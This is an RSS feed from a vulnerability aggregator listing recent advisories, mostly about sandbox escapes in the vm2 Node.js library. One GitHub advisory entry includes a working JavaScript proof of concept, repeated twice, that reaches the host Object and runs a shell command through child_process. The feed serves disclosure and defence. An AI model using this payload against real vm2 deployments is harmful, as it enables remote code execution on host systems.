<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from all</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 14:11:55 +0000</lastBuildDate>
    <item>
      <title>bdu:2026-06906</title>
      <link>https://cve.radiocsirt.org/vuln/bdu:2026-06906</link>
      <description>bdu:2026-06906</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/bdu:2026-06906</guid>
    </item>
    <item>
      <title>EUVD-2026-364325</title>
      <link>https://cve.radiocsirt.org/vuln/euvd-2026-364325</link>
      <description>EUVD-2026-364325</description>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/euvd-2026-364325</guid>
    </item>
    <item>
      <title>fkie_cve-2026-43997</title>
      <link>https://cve.radiocsirt.org/vuln/fkie_cve-2026-43997</link>
      <description>&lt;p&gt;vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.0, it is possible to obtain the host Object. There are various ways to use the host Object, to escape the sandbox, one example would be using HostObject.getOwnPropertySymbols to obtain Symbol(nodejs.util.inspect.custom). This vulnerability is fixed in 3.11.0.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/fkie_cve-2026-43997</guid>
    </item>
    <item>
      <title>GHSA-47x8-96vw-5wg6 — vm2 Access to Host Object Enables Sandbox Escape</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-47x8-96vw-5wg6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;There are various ways to use the host `Object`, to escape the sandbox, one example would be using  `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, [&amp;#39;__proto__&amp;#39;]]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);&lt;/p&gt;
&lt;p&gt;const obj = {
	[sym]: (depth, opt, inspect) =&amp;gt; {
		inspect.constructor(&amp;#34;return process.getBuiltinModule(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;ls&amp;#39;,{stdio:&amp;#39;inherit&amp;#39;})&amp;#34;)();
	},
	valueOf: undefined,
	constructor: undefined,
};&lt;/p&gt;
&lt;p&gt;WebAssembly.compileStreaming(obj).catch(() =&amp;gt; {});
```&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;Sandbox Escape -&amp;gt; RCE&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: vm2&lt;/p&gt;
&lt;p&gt;### Summary&lt;/p&gt;
&lt;p&gt;It is possible to obtain the host `Object`, https://github.com/patriksimek/vm2/commit/ebcfe94ad2f864f0bc35e78cff1d921107cfd160 added some protections, but the implementation is incomplete.&lt;/p&gt;
&lt;p&gt;### Details&lt;/p&gt;
&lt;p&gt;There are various ways to use the host `Object`, to escape the sandbox, one example would be using  `HostObject.getOwnPropertySymbols` to obtain `Symbol(nodejs.util.inspect.custom)`&lt;/p&gt;
&lt;p&gt;### PoC&lt;/p&gt;
&lt;p&gt;```js
const g = {}.__lookupGetter__;
const a = Buffer.apply;
const p = a.apply(g, [Buffer, [&amp;#39;__proto__&amp;#39;]]);
const o = p.call(p.call(a));
const HObject = o.constructor;
sym = HObject.getOwnPropertySymbols(Buffer.prototype).at(0);&lt;/p&gt;
&lt;p&gt;const obj = {
	[sym]: (depth, opt, inspect) =&amp;gt; {
		inspect.constructor(&amp;#34;return process.getBuiltinModule(&amp;#39;child_process&amp;#39;).execSync(&amp;#39;ls&amp;#39;,{stdio:&amp;#39;inherit&amp;#39;})&amp;#34;)();
	},
	valueOf: undefined,
	constructor: undefined,
};&lt;/p&gt;
&lt;p&gt;WebAssembly.compileStreaming(obj).catch(() =&amp;gt; {});
```&lt;/p&gt;
&lt;p&gt;### Impact&lt;/p&gt;
&lt;p&gt;Sandbox Escape -&amp;gt; RCE&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-47x8-96vw-5wg6</guid>
    </item>
    <item>
      <title>RHSA-2026:50850 — Red Hat Security Advisory: Red Hat Ansible Automation Platform 2.1 security update</title>
      <link>https://cve.radiocsirt.org/vuln/rhsa-2026:50850</link>
      <description>&lt;p&gt;shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators vm2: vm2: Arbitrary code execution via sandbox escape vm2: vm2: Remote code execution due to path restriction bypass via symlinks vm2: vm2: Remote code execution via NodeVM builtin allowlist bypass vm2: vm2: Sandbox escape allows direct interaction with host objects vm2: vm2: Sandbox escape leads to Denial of Service vm2: vm2: Information disclosure through unsanitized host paths vm2: vm2: Sandbox escape due to code transformer optimization bypass vm2: vm2: Denial of Service via host memory exhaustion vm2: vm2: Sandbox Escape leading to Arbitrary Code Execution vm2: vm2: Sandbox escape via arbitrary prototype access leading to arbitrary code execution vm2: vm2: Arbitrary code execution via nested NodeVM bypass vm2: vm2: Arbitrary code execution due to sandbox escape vm2: vm2: Arbitrary Code Execution via Sandbox Escape vm2: vm2: Arbitrary Code Execution due to sandbox escape vulnerability vm2: vm2: Arbitrary code execution via sandbox escape vulnerability vm2: vm2: Sandbox escape allows arbitrary code execution on the host system vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions vm2: vm2: NodeVM observability builtins leak host process and HTTP request data vm2: vm2: Integrity…&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;shell-quote: shell-quote: Arbitrary code execution via command injection due to unescaped line terminators vm2: vm2: Arbitrary code execution via sandbox escape vm2: vm2: Remote code execution due to path restriction bypass via symlinks vm2: vm2: Remote code execution via NodeVM builtin allowlist bypass vm2: vm2: Sandbox escape allows direct interaction with host objects vm2: vm2: Sandbox escape leads to Denial of Service vm2: vm2: Information disclosure through unsanitized host paths vm2: vm2: Sandbox escape due to code transformer optimization bypass vm2: vm2: Denial of Service via host memory exhaustion vm2: vm2: Sandbox Escape leading to Arbitrary Code Execution vm2: vm2: Sandbox escape via arbitrary prototype access leading to arbitrary code execution vm2: vm2: Arbitrary code execution via nested NodeVM bypass vm2: vm2: Arbitrary code execution due to sandbox escape vm2: vm2: Arbitrary Code Execution via Sandbox Escape vm2: vm2: Arbitrary Code Execution due to sandbox escape vulnerability vm2: vm2: Arbitrary code execution via sandbox escape vulnerability vm2: vm2: Sandbox escape allows arbitrary code execution on the host system vm2: vm2: Sandbox escape leading to arbitrary code execution via security bypass vm2: vm2: Sandbox escape via internal HTTP built-ins leading to network restriction bypass vm2: vm2: Arbitrary code execution due to incomplete sandbox restrictions vm2: vm2: NodeVM observability builtins leak host process and HTTP request data vm2: vm2: Integrity…&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/rhsa-2026:50850</guid>
    </item>
    <item>
      <title>WID-SEC-W-2026-1349 — vm2: Mehrere Schwachstellen</title>
      <link>https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1349</link>
      <description>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;Ein Angreifer kann mehrere Schwachstellen in vm2 ausnutzen, um beliebigen Programmcode auszuführen, um einen Denial of Service Angriff durchzuführen, um Informationen offenzulegen, und um Sicherheitsvorkehrungen zu umgehen.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/wid-sec-w-2026-1349</guid>
    </item>
  </channel>
</rss>
